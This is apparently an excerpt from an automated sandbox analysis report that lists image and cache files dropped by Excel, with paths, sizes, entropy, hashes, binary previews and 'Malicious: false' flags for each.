SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DF1CC3E.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 199 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4740
Entropy (8bit):	7.917839815538774
Encrypted:	false
SSDEEP:	96:oAnIkq3L3l05ZEpmgsv0Q3UtPwkCYHMYPhcky7JcO7dY/:oAnz15qhsrUtPwYHtPhOZ7dY/
MD5:	493B0785A76407BFBD3983964D9EA288
SHA1:	D4F7298439073EA125F7EE9C415091EF8C71FE01
SHA-256:	CDAD5DACB34C7C421ADE9645520051A1620E32DBB41990CF05C3D6BABC9BC1ED
SHA-512:	A343C143BFCC69B5AEEF78DEE567F80769541861310D7A3F4985AADE428F3D47B29228857A1A0FFC7F54E4E88699014253DCD06554ABE586953750685F37A550
Malicious:	false
Preview:	.PNG........IHDR.......~........,....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^..r...5W.._..~...\|.......P...#...M ).-R6ER.%j4.......}..n.......46z...H....I.d...2OU..u...F...../.....H......../4...Q"..)`.....T-..v)....j...J.b.....L..x....T......F....m....PB...x<..N...%."q[j..\./--...\|...Q..2..;...{p..q..p.w.....n.......?...%\|2..\......R..`..t1....46%..Z."...f..U.X....MaO......)...O.:.Vo.z..&.D<....o...'....}...i...\|...b1.T.t:...G.~.`..0q..F..6..W.D.R..+...O.V......7...}..?P....P4..........^........6W...J..R.l...H...d..= V.M...)..U.V....".h0..ds..F".x<......hy...m.v{...O....Zhw.()W.X......U.....Z.2[K.R.p4....;L$S..\| ..GS.f...\|......\|?.M.2.z.=[oa).k.F;_.E..l7Z..Ko(.....t..H_.T.m..0.).;=T.7;X..s....\|.Nx z.....$.....Yn..Ff.n...Q..x..l'......s...L......X".\|6_..#8=<....[..H.^X.'..I.n .B.b..o.Z.3(........S..2.Xc....T.5.jk 2.....[B..8-3..*+_n..,S2...G.T.tG..G.O...0......p$..:.. .F.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69EC2A79.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98FE530E.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9EE93CA2.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1824
Entropy (8bit):	3.1396658634113037
Encrypted:	false
SSDEEP:	24:YF09+01Uo7v3dLcFTUDb2Iyzj5s9SKiDHaXRmf/RQfwRSER8vdR+R/Ro8w:4oj3dLcFTvIw5sZiaQm
MD5:	8DB7C9EB4234BEF9BBB39F602BCEB824
SHA1:	E98F58B395663F25D6220D7C033B6D15C53CECEC
SHA-256:	04213745DB3ED00DB4562DC0D889428588FC147E536078741C98AC5578ECE6D4
SHA-512:	5FC135D32B3E75872E8254B5ED8C5648B052AB5C1466AEAE7BA3C653BEB236FDC48F68A3D3378138C8009F59E561D09A7A22E708DBD5F9846061FBAD67F082FE
Malicious:	false
Preview:	....l...............1...............xM.. EMF.... ...!...................V...........................fZ..U"..F...........GDIC.........rH...................................................2...........................-.........!...2.......................2......................................................@..Calibri..#.7..K.h."..Iww@.zw."f.....-.................2.................L.......2...............$.a.......2.$.........$...6.b.......2.6.........6...H.e.......2.H.........H...Z.l.......2.Z.........Z...l.2.......'...................................2...............2...............................2...!.......'.......................%...........L...d...............1...............2...!..............?...........?............................................................2.......................................R...p................................@..C.a.l.i.b.r.i.................................................................zw..........................K.............4."..e]w.."...YwO8.W

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A4A722F1.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 110 x 167, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12102
Entropy (8bit):	7.961820953240898
Encrypted:	false
SSDEEP:	192:mCDzUPwtX3W0bXeFgeK+HsT/MtGLWIoo5LKApRCRhZW3Fg8wW5eRidb/iAl6NXbs:mC3U45FXcgetMTi633h3FVz5eRObiAcu
MD5:	1C539D78D01284594C999E790447F6FB
SHA1:	582531AE27BDD6E091043EF4F38ECBEF0A6FB2F1
SHA-256:	62583DB38588AC74F6EC4D8FDCC94780C0206F21BE3A5CF90AC2E212EBC3FAF5
SHA-512:	132F227B9762B2AAD02327DDBC61B1F6786BBA03FFC233FFF223D41E3E09534DC4E98EFC5C064F26169D4C1C998999B2E888D685CEEC0A5B6013E39F1FEB52F7
Malicious:	false
Preview:	.PNG........IHDR...n..........i.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^....uE..p....LTl).00....T@....D.....,.N@P,l..P..........7.f....s.w....}...k.Y.?k......._..{....z(....x..^.W......z.e`...Y....U..q..i....b....6n`.....0..5....?/.~......7...?.~...w..}.{..dy.^U.;../}.....(..K...U~...W....}n9s._.p.;.{>.x.3..o......v.d.{...?...z}.)...\|.#..=...s.1........C.=...:...}..._...x`..-oY..........y.C._..Z......v.c\....k..I..}..^^...1.r.!k..y.{^y.k^S......r..W...>..._.....?....\|.;../~q../.Y^............O,w............{g.A.{...y.{._..nu.[..~...Zgns...N....nw...\.e...}.C.&.lR.t&....>........[....Y.zV..'?.....o...d..E.R...Vf....(........?.........~.2.0=..O.m=.../w....3.....<...&..>.)OyJe.........xm...B@`......f7.YA.L.......>..Oy..._..A...>...A.zP9.....;.P..w.....\.B...m........p..u.......2.s..\y...Pg...,....o^>..O.:.....{6.5._...(7.....~......^..r.k_.<.../_..W.c..r..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB377A3A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9A26101.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC2E50F3.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 550x310, frames 3
Category:	dropped
Size (bytes):	29499
Entropy (8bit):	7.667442162526095
Encrypted:	false
SSDEEP:	384:ac8UyN1qqyn7FdNfzZY3AJ0NcoEwa4OXyTqEunn9k+MPiEWsKHBm8oguHh9kt98g:p8wn7TNfzZ0NcnwR6kvKPsPWghY6g
MD5:	4FBDDF16124B6C9368537DF70A238C14
SHA1:	45E34D715128C6954F589910E6D0429370D3E01A
SHA-256:	0668A8E7DA394FE73B994AD85F6CA782F6C09BFF2F35581854C2408CF3909D86
SHA-512:	EA17593F175D49792629EC35320AD21D5707CB4CF9E3A7B5DA362FC86AF207F0C14059B51233C3E371F2B7830EAD693B604264CA50968891B420FEA2FC4B29EC
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................6.&.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...0.F...GEH.[....^......Z]k?B..]...A.....q.<..].c....G....Z}.....=.y1.......x->.=.....<.........<..E....a.L...h.c....O..e..a.L...h.c....O..e..a.L...k/_..Mf.[.o.@C(..k^..P..l8........${..Ly.)..'".....N)." .$e.a....-....B.{.\f...).%a.J..>.9b.X..V.%i.Q....%h.V.E...X..V..Q..GQRR?A..!..;.g..B...2..u..W............'..kN.X.,Fy+G...(.r.g..y+O..X.,Fy+H.#)_,...%.r.9Q

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D2E7424C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 110 x 167, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12102
Entropy (8bit):	7.961820953240898
Encrypted:	false
SSDEEP:	192:mCDzUPwtX3W0bXeFgeK+HsT/MtGLWIoo5LKApRCRhZW3Fg8wW5eRidb/iAl6NXbs:mC3U45FXcgetMTi633h3FVz5eRObiAcu
MD5:	1C539D78D01284594C999E790447F6FB
SHA1:	582531AE27BDD6E091043EF4F38ECBEF0A6FB2F1
SHA-256:	62583DB38588AC74F6EC4D8FDCC94780C0206F21BE3A5CF90AC2E212EBC3FAF5
SHA-512:	132F227B9762B2AAD02327DDBC61B1F6786BBA03FFC233FFF223D41E3E09534DC4E98EFC5C064F26169D4C1C998999B2E888D685CEEC0A5B6013E39F1FEB52F7
Malicious:	false
Preview:	.PNG........IHDR...n..........i.....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs..!...!..........IDATx^....uE..p....LTl).00....T@....D.....,.N@P,l..P..........7.f....s.w....}...k.Y.?k......._..{....z(....x..^.W......z.e`...Y....U..q..i....b....6n`.....0..5....?/.~......7...?.~...w..}.{..dy.^U.;../}.....(..K...U~...W....}n9s._.p.;.{>.x.3..o......v.d.{...?...z}.)...\|.#..=...s.1........C.=...:...}..._...x`..-oY..........y.C._..Z......v.c\....k..I..}..^^...1.r.!k..y.{^y.k^S......r..W...>..._.....?....\|.;../~q../.Y^............O,w............{g.A.{...y.{._..nu.[..~...Zgns...N....nw...\.e...}.C.&.lR.t&....>........[....Y.zV..'?.....o...d..E.R...Vf....(........?.........~.2.0=..O.m=.../w....3.....<...&..>.)OyJe.........xm...B@`......f7.YA.L.......>..Oy..._..A...>...A.zP9.....;.P..w.....\.B...m........p..u.......2.s..\y...Pg...,....o^>..O.:.....{6.5._...(7.....~......^..r.k_.<.../_..W.c..r..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3B54A74.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	3199944
Entropy (8bit):	1.0723286533222698
Encrypted:	false
SSDEEP:	6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
MD5:	6CFA3170A68147326768DE26F5E88F3C
SHA1:	5ABCF9E540CFE7E9F1BB50F43FB139722402D141
SHA-256:	5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
SHA-512:	5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
Malicious:	false
Preview:	....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6B60ECD.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
Category:	dropped
Size (bytes):	24075
Entropy (8bit):	6.730214296651396
Encrypted:	false
SSDEEP:	384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
MD5:	09AFF1FCE05F6A872A9F9A75B7C645F5
SHA1:	5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
SHA-256:	00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
SHA-512:	355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
Malicious:	false
Preview:	......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DAA062B0.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3296E6A.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA55EE58.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
Category:	dropped
Size (bytes):	24075
Entropy (8bit):	6.730214296651396
Encrypted:	false
SSDEEP:	384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
MD5:	09AFF1FCE05F6A872A9F9A75B7C645F5
SHA1:	5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
SHA-256:	00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
SHA-512:	355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
Malicious:	false
Preview:	......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB61327.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	241332
Entropy (8bit):	4.206799394485336
Encrypted:	false
SSDEEP:	1536:cGxLEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cQNNSk8DtKBrpb2vxrOpprf/nVq
MD5:	61C1A28D8DFA8AD6D0972823C013568D
SHA1:	E54C18B1ED224D94A0018B039684A9EA081DBD91
SHA-256:	1E8D51AEC5450C96509DEC0394F473BE0B1A7442B8132E3C864D64AEA8151237
SHA-512:	1A94FB4F918F4B77DC513ED4138F3DDF342AB8766AA4319EE3A586112C66BBCCFCAB11536F9E33D8C7195487BA29EC57C1E3967BB6FD534B150E4E132412B5E8
Malicious:	false
